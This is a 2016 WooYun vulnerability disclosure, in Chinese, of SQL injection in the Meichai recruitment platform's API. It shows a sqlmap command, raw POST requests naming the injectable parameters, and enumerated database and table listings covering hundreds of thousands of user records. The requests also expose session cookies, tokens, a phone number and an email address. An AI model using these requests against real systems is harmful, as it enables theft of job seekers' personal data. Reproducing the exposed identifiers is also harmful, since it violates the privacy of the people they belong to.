美差招聘SQL打包涉及57w会员信息跨库查询(貌似快推同库)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0208764

漏洞标题：美差招聘SQL打包涉及57w会员信息跨库查询(貌似快推同库)

漏洞作者：黑色键盘丶

提交时间：2016-05-18 18:26

修复时间：2016-07-02 19:50

公开时间：2016-07-02 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-18：细节已通知厂商并且等待厂商处理中
2016-05-18：厂商已经确认，细节仅向厂商公开
2016-05-28：细节向核心白帽子及相关领域专家公开
2016-06-07：细节向普通白帽子公开
2016-06-17：细节向实习白帽子公开
2016-07-02：细节向公众公开

简要描述：

详细说明：

sqlmap.py -r 1.txt --dbs
---------------------------------post数据包----------_token参数----------
POST /point/exchangegoods HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Host: api.meichai.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.5.0
_appid=1001&_token=UTQmHK731469156255404032&_ts=1463230915613&_sn=d6e8756de72a7dddcf3bfb1f37d63869&goodsid=1&orderqty=1

数据库
back-end DBMS: MySQL 5.0
available databases [6]:
[*] blogrdt
[*] information_schema
[*] kuaitui
[*] meichai
[*] mysql
[*] test

当前库表信息
Database: meichai
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| sys_infcall              | 8312577 |
| sys_applog               | 7809269 |
| cbd_searchhist           | 1811749 |
| cbd_assignhist           | 1346284 |
| cbd_objevent             | 711765  |
| cbd_memo                 | 574367  |
| acc_user                 | 572579  |
| acc_userlog              | 572570  |
| bill_user                | 572108  |
| cbd_statushist           | 549533  |
| sys_inflog               | 541664  |
| acc_userverify           | 524598  |
| acc_userbasic            | 524597  |
| bill_userpointtrans      | 377614  |
| acc_peaccesslog          | 361723  |
| cbd_projeventcount       | 333766  |
| cbd_projevent            | 329131  |
| cbd_projeventbr          | 314445  |
| cbd_objtag               | 288710  |
| cbd_msglist              | 258346  |
| acc_userbind             | 256886  |
| cbd_projeventjob         | 250898  |
| acc_session              | 238229  |
| sys_kv                   | 208622  |
| sys_appdownlog           | 200446  |
| acc_userwant             | 196105  |
| acc_usercontact          | 188418  |
| cbd_mobileverify         | 182141  |
| acc_userwantfunc         | 179698  |
| acc_accesslog            | 165739  |
| cbd_message              | 157605  |
| cbd_projeventcontact     | 154800  |
| cbd_assign               | 142311  |
| acc_userwantarea         | 135628  |
| acc_session_copy         | 123815  |
| cbd_companyaddr          | 120026  |
| sys_actcode              | 112155  |
| zmobiletemp1             | 112083  |
| cbd_projeventbrcontact   | 108219  |
| cbd_ordergoods           | 102329  |
| cbd_orderhead            | 102329  |
| cbd_userpointtask        | 82780   |
| sms_sendqueue            | 65537   |
| sms_phonedetail          | 64551   |
| cbd_companycontact       | 63183   |
| acc_userrate             | 55394   |
| bill_userpoint           | 53510   |
| acc_staffbasic           | 47526   |
| cbd_company              | 47175   |
| cbd_projrecom            | 43514   |
| cbd_file                 | 37318   |
| cbd_objfile              | 36105   |
| bill_usertrans           | 33633   |
| cbd_todo                 | 32554   |
| bill_userpointbak        | 31268   |
| acc_sharelog             | 27488   |
| cbd_project              | 26702   |
| t2                       | 18695   |
| cbd_companyextra         | 17739   |
| bill_kttrans             | 16715   |
| sys_statkv               | 14815   |
| bill_usertrans8          | 13636   |
| cbd_companycommentreply  | 11772   |
| cbd_pushqueue2           | 11440   |
| cbd_job                  | 7275    |
| cbd_apply                | 7024    |
| cbd_companysalarydet     | 6973    |
| bill_companytrans8       | 6884    |
| cbd_apply8               | 6818    |
| cbd_exchangecode         | 6161    |
| cbd_companycommentreward | 5903    |
| cbd_payqueuelog          | 5897    |
| cbd_companycommentlike   | 5819    |
| cbd_payqueue             | 5690    |
| sys_huaming              | 4500    |
| sys_nuoyaarea            | 3512    |
| sys_area                 | 3326    |
| sys_bizarea              | 3282    |
| cbd_userlotstat          | 2678    |
| cbd_exportlog            | 2645    |
| cbd_nuoyaverify          | 2543    |
| acc_usermobile8          | 2433    |
| cbd_userexchangehist     | 2359    |
| adv_applog               | 2326    |
| acc_userbank8            | 2241    |
| t1                       | 2166    |
| acc_usercompany8         | 2148    |
| acc_user8                | 2128    |
| acc_userset8             | 2128    |
| bill_user8               | 2128    |
| cbd_cv                   | 1541    |
| cbd_projrecomdet         | 1531    |
| sys_industryfunc         | 1321    |
| cbd_companysalaryreport  | 1250    |
| sys_feedback             | 1179    |
| cbd_companycomment       | 1159    |
| cbd_companycommentstat   | 1159    |
| sys_bankcardmap          | 1085    |
| agent_invite_member      | 930     |
| cbd_projeventprom        | 918     |
| cbd_companyrate          | 819     |
| cbd_companysalarylevel   | 811     |
| sys_gencode              | 690     |
| sys_funcsalary           | 567     |
| cbd_action               | 410     |
| sys_metro                | 380     |
| cbd_channelimport        | 334     |
| acc_userbank             | 259     |
| cbd_companyimport        | 247     |
| sys_applogdic            | 217     |
| sys_function             | 214     |
| zmobiletemp2             | 198     |
| cbd_actioncount          | 197     |
| sys_menu                 | 184     |
| cbd_projeventreport      | 182     |
| sys_menu111              | 148     |
| cbd_companysalaryimport  | 124     |
| cbd_jobhist              | 120     |
| cbd_projeventtime        | 119     |
| sys_industry             | 101     |
| cbd_pushqueue            | 96      |
| cbd_companysalary        | 92      |
| acc_userset              | 87      |
| cbd_talentpool           | 82      |
| cbd_qrcode               | 79      |
| sys_template             | 74      |
| acc_roleresource         | 65      |
| sys_ids3                 | 64      |
| bill_kttrans8            | 56      |
| sys_appversion           | 47      |
| sys_option               | 46      |
| sys_menu2                | 42      |
| cbd_citytag              | 40      |
| sys_menu3                | 35      |
| sys_areamap              | 31      |
| acc_qrlog                | 26      |
| sys_ids                  | 24      |
| sys_partfunction         | 21      |
| acc_userpush8            | 20      |
| cbd_recom                | 19      |
| sys_bankmap              | 18      |
| sys_nuoyabank            | 18      |
| acc_session8             | 17      |
| bill_company8            | 17      |
| cbd_companypayset        | 17      |
| acc_role                 | 15      |
| acc_userwork             | 15      |
| cbd_companycommentreport | 15      |
| sys_ids2                 | 14      |
| cbd_companygencode       | 12      |
| sys_wblist               | 12      |
| cbd_pointrule            | 10      |
| acc_userpush             | 8       |
| cbd_branchservice        | 8       |
| cbd_goods                | 8       |
| cbd_mcservice            | 8       |
| cbd_pointtask            | 8       |
| cbd_companyapp           | 6       |
| sms_batch                | 5       |
| sms_theme                | 5       |
| sms_sendrecord           | 4       |
| adv_schedule             | 2       |
| adv_scheduledetail       | 2       |
| cbd_projsalary           | 2       |
| sys_term                 | 2       |
| adv_client               | 1       |
| adv_place                | 1       |
| bill_kt                  | 1       |
| bill_kt8                 | 1       |
| cbd_activitytheme        | 1       |
+--------------------------+---------+

垮裤查询
Database: kuaitui
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| acc_user               | 280989  |
| bill_user              | 280589  |
| acc_accesslog          | 269991  |
| acc_userbind           | 263773  |
| acc_wxid               | 225985  |
| cbd_mycv               | 115814  |
| cbd_wxforward          | 92318   |
| sha_postmeta           | 17683   |
| sha_posts              | 11836   |
| sha_term_relationships | 7933    |
| acc_sharelog           | 7102    |
| sys_kv                 | 6294    |
| cbd_jobop              | 5800    |
| sys_inflog             | 4423    |
| cbd_qrcode             | 3164    |
| bill_usertrans         | 2629    |
| sha_term_taxonomy      | 2432    |
| sha_terms              | 2426    |
| cbd_cvdef              | 1973    |
| cbd_job                | 1919    |
| cbd_assignjob          | 1893    |
| cbd_myfav              | 1565    |
| cbd_cvop               | 1205    |
| cbd_column             | 838     |
| cbd_cv                 | 745     |
| acc_userlog            | 597     |
| cbd_cvdef_copy         | 594     |
| cbd_site               | 530     |
| acc_invitecode         | 516     |
| cbd_qrcode_copy        | 460     |
| acc_applyinvite        | 412     |
| cbd_companyuser        | 352     |
| bill_company           | 342     |
| cbd_company            | 336     |
| cbd_sitecover          | 290     |
| acc_userbind2          | 260     |
| cbd_promotion          | 259     |
| cbd_companyextra       | 258     |
| acc_actcode            | 247     |
| sys_statkv             | 216     |
| sha_options            | 187     |
| bill_kttrans           | 179     |
| cbd_jobcv              | 173     |
| cbd_chmember           | 172     |
| cbd_client             | 154     |
| cbd_companycert        | 143     |
| bill_companytrans      | 138     |
| cbd_hunter             | 111     |
| cbd_executive          | 104     |
| cbd_filter             | 72      |
| cbd_chcom              | 70      |
| cbd_columnjob          | 47      |
| cbd_eventcover         | 46      |
| cbd_eventjob           | 46      |
| cbd_job_copy           | 46      |
| bill_invinfo           | 36      |
| cbd_chmemapply         | 33      |
| sha_usermeta           | 25      |
| sys_template           | 23      |
| cbd_event              | 21      |
| cbd_channel            | 19      |
| cbd_companyopt         | 18      |
| sys_option             | 16      |
| cbd_jobrefer           | 15      |
| cbd_cvmemo             | 13      |
| sys_ids                | 12      |
| sys_file               | 11      |
| bill_cashapply         | 8       |
| bill_invapply          | 5       |
| cbd_eventpromotion     | 4       |
| acc_subinvite          | 3       |
| cbd_chmemlevel         | 2       |
| bill_kt                | 1       |
| opc_user               | 1       |
| sha_users              | 1       |
| sys_fileextra          | 1       |
+------------------------+---------+

-------------post数据包-------------
POST /api/company/savecontact HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 260
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/page?_token=9LxQYm731482319550025728
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
id=63752&company=200029965&companyname=snake123&type=1&name=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&sex=%E5%A5%B3&position=11111&phone=11111&mobile=13566641461&fax=111&email=313173917%40qq.com&random=0.33943755459040403&_appid=2001&_token=9LxQYm731482319550025728
--------------------------------------------- 参数sextype---------
POST /api/resume/findtalentpools HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 315
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/main?_appid=&_token=9LxQYm731482319550025728&_ts=1463233935659
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
mode=1&wantarea1=0&wantarea2=0&wantarea=0&wantfunc1=0&wantfunc=0&jobseekstatus=0&sextype=%E5%85%A8%E9%83%A8&expryear=%E4%B8%8D%E9%99%90&degree=%E4%B8%8D%E9%99%90&minage=1&maxage=1&minsalary=1&maxsalary=111&username=1111&mobile=11&page=1&count=25&random=0.1719370405189693&_appid=2001&_token=9LxQYm731482319550025728

漏洞证明：

sqlmap.py -r 1.txt --dbs
---------------------------------post数据包----------_token参数----------
POST /point/exchangegoods HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Host: api.meichai.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.5.0
_appid=1001&_token=UTQmHK731469156255404032&_ts=1463230915613&_sn=d6e8756de72a7dddcf3bfb1f37d63869&goodsid=1&orderqty=1

数据库
back-end DBMS: MySQL 5.0
available databases [6]:
[*] blogrdt
[*] information_schema
[*] kuaitui
[*] meichai
[*] mysql
[*] test

当前库表信息
Database: meichai
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| sys_infcall              | 8312577 |
| sys_applog               | 7809269 |
| cbd_searchhist           | 1811749 |
| cbd_assignhist           | 1346284 |
| cbd_objevent             | 711765  |
| cbd_memo                 | 574367  |
| acc_user                 | 572579  |
| acc_userlog              | 572570  |
| bill_user                | 572108  |
| cbd_statushist           | 549533  |
| sys_inflog               | 541664  |
| acc_userverify           | 524598  |
| acc_userbasic            | 524597  |
| bill_userpointtrans      | 377614  |
| acc_peaccesslog          | 361723  |
| cbd_projeventcount       | 333766  |
| cbd_projevent            | 329131  |
| cbd_projeventbr          | 314445  |
| cbd_objtag               | 288710  |
| cbd_msglist              | 258346  |
| acc_userbind             | 256886  |
| cbd_projeventjob         | 250898  |
| acc_session              | 238229  |
| sys_kv                   | 208622  |
| sys_appdownlog           | 200446  |
| acc_userwant             | 196105  |
| acc_usercontact          | 188418  |
| cbd_mobileverify         | 182141  |
| acc_userwantfunc         | 179698  |
| acc_accesslog            | 165739  |
| cbd_message              | 157605  |
| cbd_projeventcontact     | 154800  |
| cbd_assign               | 142311  |
| acc_userwantarea         | 135628  |
| acc_session_copy         | 123815  |
| cbd_companyaddr          | 120026  |
| sys_actcode              | 112155  |
| zmobiletemp1             | 112083  |
| cbd_projeventbrcontact   | 108219  |
| cbd_ordergoods           | 102329  |
| cbd_orderhead            | 102329  |
| cbd_userpointtask        | 82780   |
| sms_sendqueue            | 65537   |
| sms_phonedetail          | 64551   |
| cbd_companycontact       | 63183   |
| acc_userrate             | 55394   |
| bill_userpoint           | 53510   |
| acc_staffbasic           | 47526   |
| cbd_company              | 47175   |
| cbd_projrecom            | 43514   |
| cbd_file                 | 37318   |
| cbd_objfile              | 36105   |
| bill_usertrans           | 33633   |
| cbd_todo                 | 32554   |
| bill_userpointbak        | 31268   |
| acc_sharelog             | 27488   |
| cbd_project              | 26702   |
| t2                       | 18695   |
| cbd_companyextra         | 17739   |
| bill_kttrans             | 16715   |
| sys_statkv               | 14815   |
| bill_usertrans8          | 13636   |
| cbd_companycommentreply  | 11772   |
| cbd_pushqueue2           | 11440   |
| cbd_job                  | 7275    |
| cbd_apply                | 7024    |
| cbd_companysalarydet     | 6973    |
| bill_companytrans8       | 6884    |
| cbd_apply8               | 6818    |
| cbd_exchangecode         | 6161    |
| cbd_companycommentreward | 5903    |
| cbd_payqueuelog          | 5897    |
| cbd_companycommentlike   | 5819    |
| cbd_payqueue             | 5690    |
| sys_huaming              | 4500    |
| sys_nuoyaarea            | 3512    |
| sys_area                 | 3326    |
| sys_bizarea              | 3282    |
| cbd_userlotstat          | 2678    |
| cbd_exportlog            | 2645    |
| cbd_nuoyaverify          | 2543    |
| acc_usermobile8          | 2433    |
| cbd_userexchangehist     | 2359    |
| adv_applog               | 2326    |
| acc_userbank8            | 2241    |
| t1                       | 2166    |
| acc_usercompany8         | 2148    |
| acc_user8                | 2128    |
| acc_userset8             | 2128    |
| bill_user8               | 2128    |
| cbd_cv                   | 1541    |
| cbd_projrecomdet         | 1531    |
| sys_industryfunc         | 1321    |
| cbd_companysalaryreport  | 1250    |
| sys_feedback             | 1179    |
| cbd_companycomment       | 1159    |
| cbd_companycommentstat   | 1159    |
| sys_bankcardmap          | 1085    |
| agent_invite_member      | 930     |
| cbd_projeventprom        | 918     |
| cbd_companyrate          | 819     |
| cbd_companysalarylevel   | 811     |
| sys_gencode              | 690     |
| sys_funcsalary           | 567     |
| cbd_action               | 410     |
| sys_metro                | 380     |
| cbd_channelimport        | 334     |
| acc_userbank             | 259     |
| cbd_companyimport        | 247     |
| sys_applogdic            | 217     |
| sys_function             | 214     |
| zmobiletemp2             | 198     |
| cbd_actioncount          | 197     |
| sys_menu                 | 184     |
| cbd_projeventreport      | 182     |
| sys_menu111              | 148     |
| cbd_companysalaryimport  | 124     |
| cbd_jobhist              | 120     |
| cbd_projeventtime        | 119     |
| sys_industry             | 101     |
| cbd_pushqueue            | 96      |
| cbd_companysalary        | 92      |
| acc_userset              | 87      |
| cbd_talentpool           | 82      |
| cbd_qrcode               | 79      |
| sys_template             | 74      |
| acc_roleresource         | 65      |
| sys_ids3                 | 64      |
| bill_kttrans8            | 56      |
| sys_appversion           | 47      |
| sys_option               | 46      |
| sys_menu2                | 42      |
| cbd_citytag              | 40      |
| sys_menu3                | 35      |
| sys_areamap              | 31      |
| acc_qrlog                | 26      |
| sys_ids                  | 24      |
| sys_partfunction         | 21      |
| acc_userpush8            | 20      |
| cbd_recom                | 19      |
| sys_bankmap              | 18      |
| sys_nuoyabank            | 18      |
| acc_session8             | 17      |
| bill_company8            | 17      |
| cbd_companypayset        | 17      |
| acc_role                 | 15      |
| acc_userwork             | 15      |
| cbd_companycommentreport | 15      |
| sys_ids2                 | 14      |
| cbd_companygencode       | 12      |
| sys_wblist               | 12      |
| cbd_pointrule            | 10      |
| acc_userpush             | 8       |
| cbd_branchservice        | 8       |
| cbd_goods                | 8       |
| cbd_mcservice            | 8       |
| cbd_pointtask            | 8       |
| cbd_companyapp           | 6       |
| sms_batch                | 5       |
| sms_theme                | 5       |
| sms_sendrecord           | 4       |
| adv_schedule             | 2       |
| adv_scheduledetail       | 2       |
| cbd_projsalary           | 2       |
| sys_term                 | 2       |
| adv_client               | 1       |
| adv_place                | 1       |
| bill_kt                  | 1       |
| bill_kt8                 | 1       |
| cbd_activitytheme        | 1       |
+--------------------------+---------+

垮裤查询
Database: kuaitui
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| acc_user               | 280989  |
| bill_user              | 280589  |
| acc_accesslog          | 269991  |
| acc_userbind           | 263773  |
| acc_wxid               | 225985  |
| cbd_mycv               | 115814  |
| cbd_wxforward          | 92318   |
| sha_postmeta           | 17683   |
| sha_posts              | 11836   |
| sha_term_relationships | 7933    |
| acc_sharelog           | 7102    |
| sys_kv                 | 6294    |
| cbd_jobop              | 5800    |
| sys_inflog             | 4423    |
| cbd_qrcode             | 3164    |
| bill_usertrans         | 2629    |
| sha_term_taxonomy      | 2432    |
| sha_terms              | 2426    |
| cbd_cvdef              | 1973    |
| cbd_job                | 1919    |
| cbd_assignjob          | 1893    |
| cbd_myfav              | 1565    |
| cbd_cvop               | 1205    |
| cbd_column             | 838     |
| cbd_cv                 | 745     |
| acc_userlog            | 597     |
| cbd_cvdef_copy         | 594     |
| cbd_site               | 530     |
| acc_invitecode         | 516     |
| cbd_qrcode_copy        | 460     |
| acc_applyinvite        | 412     |
| cbd_companyuser        | 352     |
| bill_company           | 342     |
| cbd_company            | 336     |
| cbd_sitecover          | 290     |
| acc_userbind2          | 260     |
| cbd_promotion          | 259     |
| cbd_companyextra       | 258     |
| acc_actcode            | 247     |
| sys_statkv             | 216     |
| sha_options            | 187     |
| bill_kttrans           | 179     |
| cbd_jobcv              | 173     |
| cbd_chmember           | 172     |
| cbd_client             | 154     |
| cbd_companycert        | 143     |
| bill_companytrans      | 138     |
| cbd_hunter             | 111     |
| cbd_executive          | 104     |
| cbd_filter             | 72      |
| cbd_chcom              | 70      |
| cbd_columnjob          | 47      |
| cbd_eventcover         | 46      |
| cbd_eventjob           | 46      |
| cbd_job_copy           | 46      |
| bill_invinfo           | 36      |
| cbd_chmemapply         | 33      |
| sha_usermeta           | 25      |
| sys_template           | 23      |
| cbd_event              | 21      |
| cbd_channel            | 19      |
| cbd_companyopt         | 18      |
| sys_option             | 16      |
| cbd_jobrefer           | 15      |
| cbd_cvmemo             | 13      |
| sys_ids                | 12      |
| sys_file               | 11      |
| bill_cashapply         | 8       |
| bill_invapply          | 5       |
| cbd_eventpromotion     | 4       |
| acc_subinvite          | 3       |
| cbd_chmemlevel         | 2       |
| bill_kt                | 1       |
| opc_user               | 1       |
| sha_users              | 1       |
| sys_fileextra          | 1       |
+------------------------+---------+

-------------post数据包-------------
POST /api/company/savecontact HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 260
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/page?_token=9LxQYm731482319550025728
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
id=63752&company=200029965&companyname=snake123&type=1&name=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&sex=%E5%A5%B3&position=11111&phone=11111&mobile=13566641461&fax=111&email=313173917%40qq.com&random=0.33943755459040403&_appid=2001&_token=9LxQYm731482319550025728
--------------------------------------------- 参数sextype---------
POST /api/resume/findtalentpools HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 315
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/main?_appid=&_token=9LxQYm731482319550025728&_ts=1463233935659
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
mode=1&wantarea1=0&wantarea2=0&wantarea=0&wantfunc1=0&wantfunc=0&jobseekstatus=0&sextype=%E5%85%A8%E9%83%A8&expryear=%E4%B8%8D%E9%99%90&degree=%E4%B8%8D%E9%99%90&minage=1&maxage=1&minsalary=1&maxsalary=111&username=1111&mobile=11&page=1&count=25&random=0.1719370405189693&_appid=2001&_token=9LxQYm731482319550025728

修复方案：

过滤

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-05-18 19:48

厂商回复：

谢谢提出者

漏洞评价：

评价

2016-05-16 12:41 | 爱偷懒的98 ( 普通白帽子 | Rank:154 漏洞数:52 | 从前车马邮件都很慢，一生只够爱一个人。)

又是撞裤

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0208764

漏洞标题：美差招聘SQL打包涉及57w会员信息跨库查询(貌似快推同库)

相关厂商：meichai.in

漏洞作者：黑色键盘丶

提交时间：2016-05-18 18:26

修复时间：2016-07-02 19:50

公开时间：2016-07-02 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0208764

漏洞标题：美差招聘SQL打包涉及57w会员信息跨库查询(貌似快推同库)

相关厂商：meichai.in

漏洞作者： 黑色键盘丶

提交时间：2016-05-18 18:26

修复时间：2016-07-02 19:50

公开时间：2016-07-02 19:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0208764"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：黑色键盘丶

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源黑色键盘丶@乌云